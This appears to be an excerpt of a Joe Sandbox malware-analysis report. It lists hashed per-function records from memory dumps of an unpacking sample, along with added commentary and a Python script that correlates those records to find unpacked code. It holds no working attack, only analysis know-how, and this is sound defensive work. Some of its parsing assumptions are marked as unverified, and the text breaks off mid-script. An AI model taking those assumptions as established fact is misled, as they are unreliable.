Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
• API String ID: 0-334816167
• Opcode ID: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
• Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
• Opcode Fuzzy Hash: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
• Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
• API String ID: 0-334816167
• Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
• Instruction ID: a370831407878d2bd8e699c9f93d2fc4d030550afc3f1f046d7385fa7cd4df03
• Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
• Instruction Fuzzy Hash: 0BF1D321D087E98ADB32C67C8C543CDBFA15B53224F1943EDD4E9AB3D2C6790A46CB51
APIs
• CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 024C6675
• SysAllocString.OLEAUT32(FA46F8B5), ref: 024C66D1
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024C670E
• SysAllocString.OLEAUT32(w!s#), ref: 024C6762
• SysAllocString.OLEAUT32(A3q5), ref: 024C6808
• VariantInit.OLEAUT32(?), ref: 024C687A
• VariantClear.OLEAUT32(?), ref: 024C69DC
• SysFreeString.OLEAUT32(00000000), ref: 024C6A1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2775254435-4124187736
• Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
• Instruction ID: 4471d883d24829d293e7f5e4d13a140716708ae80f0bf33958f1c5f33134d227
• Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
• Instruction Fuzzy Hash: C012DDB66083409BD314CF29C881B6BBBEAFFC5304F25892DE695DB290D774D905CB86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
• Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction ID: cae17970a829ad014003fb070769b19a2d62e329bf1745f0b9743a69f9449325
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C1487154C3D58FD315CF2584A076BBFE1AFD2244F1889ADE4E11B782D739890ACBA2
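The two records above carry the same Opcode ID (a9be2e0f…) and the same String ID but different Instruction IDs: one copy sits in the PE-backed image dumped at 0x400000, the other in the non-PE region dumped at 0x2490000. That pattern is what a reviewer checks when the report raises "Detected unpacking": original image code reappearing, relocated, in a fresh executable allocation. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in this format and flags Opcode IDs that appear in both a PE-backed and a non-PE dump. The sample records are copied from this page with the String IDs abridged; the interpretation of the dot-separated .sdmp filename fields (base, protection, memory type) is an assumption, and only the Windows PAGE_*/MEM_* constant values used to label them are certain.

```python
"""Correlate Joe Sandbox per-function Similarity records across memory dumps.

Added example; not part of the Joe Sandbox report or its tooling. Sample
records are copied from the report with String IDs abridged. The layout of
the dot-separated .sdmp filename fields is an ASSUMPTION; only the Windows
PAGE_*/MEM_* constant values used for decoding are certain.
"""
import re
from collections import defaultdict

# Constructed sample: three records as they appear in the report, whitespace
# stripped and String IDs abridged. Records 1 and 2 share an Opcode ID.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: 7]7N$9/,8$; >?$<'=0$LSJm
• API String ID: 0-2345621967
• Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• API ID:
• String ID: 7]7N$9/,8$; >?$<'=0$LSJm
• API String ID: 0-2345621967
• Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
• Instruction ID: cae17970a829ad014003fb070769b19a2d62e329bf1745f0b9743a69f9449325
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FreeLibrary
• String ID: %(#}$/$/26-$1$#v
• API String ID: 3664257935-820666829
• Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
"""

FIELD_RE = re.compile(r"^• ([^:]+): ?(.*)$", re.M)
SOURCE_RE = re.compile(r"(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")

# Windows memory constants (certain). Their position in the filename is assumed.
PROTECT = {0x40: "PAGE_EXECUTE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x04: "PAGE_READWRITE"}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}


def decode_sdmp(name):
    """ASSUMED field layout: pid.stage.id.base.protect.state.type.index.sdmp"""
    parts = name.removesuffix(".sdmp").split(".")
    protect, mtype = int(parts[4], 16), int(parts[6], 16)
    return {
        "base": int(parts[3], 16),
        "protect": PROTECT.get(protect, hex(protect)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
    }


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = {k.strip(): v.strip() for k, v in FIELD_RE.findall(chunk)}
        m = SOURCE_RE.match(fields.get("Source File", ""))
        if not m:
            continue  # record without a parseable dump reference
        records.append({
            "sdmp": m.group(1),
            "base": int(m.group(2), 16),
            "is_pe": m.group(3) == "true",
            "api_id": fields.get("API ID", ""),
            "opcode_id": fields.get("Opcode ID", ""),
            "instruction_id": fields.get("Instruction ID", ""),
        })
    return records


def find_relocated_functions(records):
    """Opcode IDs seen at more than one dump base -> {opcode_id: {base: instruction_id}}.

    In the report the Opcode ID is identical across both dumps while the
    Instruction ID differs, consistent with an opcode-only hash that ignores
    operands (assumed) and therefore survives relocation of the code.
    """
    by_opcode = defaultdict(dict)
    for r in records:
        by_opcode[r["opcode_id"]][r["base"]] = r["instruction_id"]
    return {op: bases for op, bases in by_opcode.items() if len(bases) > 1}


def unpacking_evidence(records):
    """Functions present both in a PE-backed dump and in a non-PE region.

    Image code reappearing in a separate executable allocation is the kind
    of observation behind the report's 'Detected unpacking' signatures.
    """
    pe_bases = {r["base"] for r in records if r["is_pe"]}
    evidence = []
    for op, bases in find_relocated_functions(records).items():
        in_pe = sorted(b for b in bases if b in pe_bases)
        in_other = sorted(b for b in bases if b not in pe_bases)
        if in_pe and in_other:
            evidence.append((op, in_pe, in_other))
    return evidence


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for op, in_pe, in_other in unpacking_evidence(recs):
        print(f"{op[:16]}... image {[hex(b) for b in in_pe]} -> non-PE {[hex(b) for b in in_other]}")
        for b in in_other:
            print("    region:", decode_sdmp(next(r["sdmp"] for r in recs if r["base"] == b)))
```

Run against the full Code Analysis section rather than the three sample records, the same correlation also separates functions that exist only in the non-PE region (such as 9fc2874815… below, which has no counterpart at 0x400000) from relocated copies of image code, which narrows where to start when pulling the unpacked stage out of the 0x2490000 dump.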
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
• API String ID: 0-2174627302
• Opcode ID: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
• Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
• Opcode Fuzzy Hash: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
• Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
• API String ID: 0-2174627302
• Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
• Instruction ID: 644d1e97a3f14a4678fe64c2e7f3881588794978f6ba8177889790537d47ce88
• Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
• Instruction Fuzzy Hash: 7D727C7560C7808BD7249F38C4953AFBBE2ABD6314F198A2ED5DA87381D6798446CB03
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
• API String ID: 0-898000180
• Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
• Instruction ID: 2c30e31dff193efb6877e588cb2df0c72bb3293947671bd378e67ad73737e207
• Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
• Instruction Fuzzy Hash: 32C10EB16483508BD715CF18C8917ABB7B2EFD2314F08896DE4D68B390E335C901C7A6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: %(#}$/$/26-$1$#v
• API String ID: 3664257935-820666829
• Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
• Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M$#v
                                                                                                                                                                                                                                                                          • API String ID: 764372645-2531622275
                                                                                                                                                                                                                                                                          • Opcode ID: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                          • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                          • API String ID: 0-119712241
                                                                                                                                                                                                                                                                          • Opcode ID: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                          • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction ID: d8023877f1d4f0a9fd76882124d92d38ceb2f3f40d54c865e1d6b88deb20c264
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E1B67151C3C18AE775CF2584507FBBBD6EFD6208F1888AEC5D987292DB39410ACB26
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction ID: c0b8439f0c26c5a6023c669713cfb19d18569ccc3e59d052a4a45f8e55fa5d3e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4482F6746083509FD764CF24D8A0B2FBBE2EBE6714F28892EE58547391D771D842CB46
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                                          • API String ID: 0-1072848446
                                                                                                                                                                                                                                                                          • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                                          • Instruction ID: b9ba5027e44b9a988adada35061b53d227452ac9b061427721ea395862f94b23
• Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
• Instruction Fuzzy Hash: 53229D7160C7908FD3218B38C4643AFBBE1AF86314F188A2EE5DD87391D7759885CB62

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &'$0c=e$2g1i$<k;m$B$wy
• API String ID: 0-2430453506
• Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
• Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$0$5$D@6T$EF$zJyL
• API String ID: 0-3264166258
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
• Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$0$5$D@6T$EF$zJyL
• API String ID: 0-3264166258
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
• Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722

APIs
• GetCurrentProcessId.KERNEL32 ref: 02498A1B
• GetCurrentThreadId.KERNEL32 ref: 02498A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
• GetForegroundWindow.USER32 ref: 02498AD7
  • Part of subcall function 0249BC37: FreeLibrary.KERNEL32(02498BD2), ref: 0249BC3D
  • Part of subcall function 0249BC37: FreeLibrary.KERNEL32 ref: 0249BC5E
• ExitProcess.KERNEL32 ref: 02498BD9
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 3676751680-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
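The records above are per-function output of the Joe Sandbox IDA plugin. The detail worth pulling out is that Opcode ID 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77 is listed both in the dump of the loaded image at 0x00400000 (based on PE: true) and in the dump of the region at 0x02490000 (based on PE: false), with different Instruction IDs, and that the function which calls SHGetSpecialFolderPathW with CSIDL 0x10 sits in that non-PE-backed region. The script below is an added example written for this page; it is not part of Joe Sandbox or its IDA plugin. It parses the record lines as they are rendered here (an assumption about the layout), groups functions by Opcode ID to flag bodies present in both a PE-backed and a non-PE-backed dump, and decodes the CSIDL argument with the values from the Windows SDK. The sample input is a constructed subset of the records on this page; the hashes, addresses and API references in it are the report's own.

```python
"""Correlate Joe Sandbox IDA-plugin function records across memory dumps."""
import re
from collections import defaultdict

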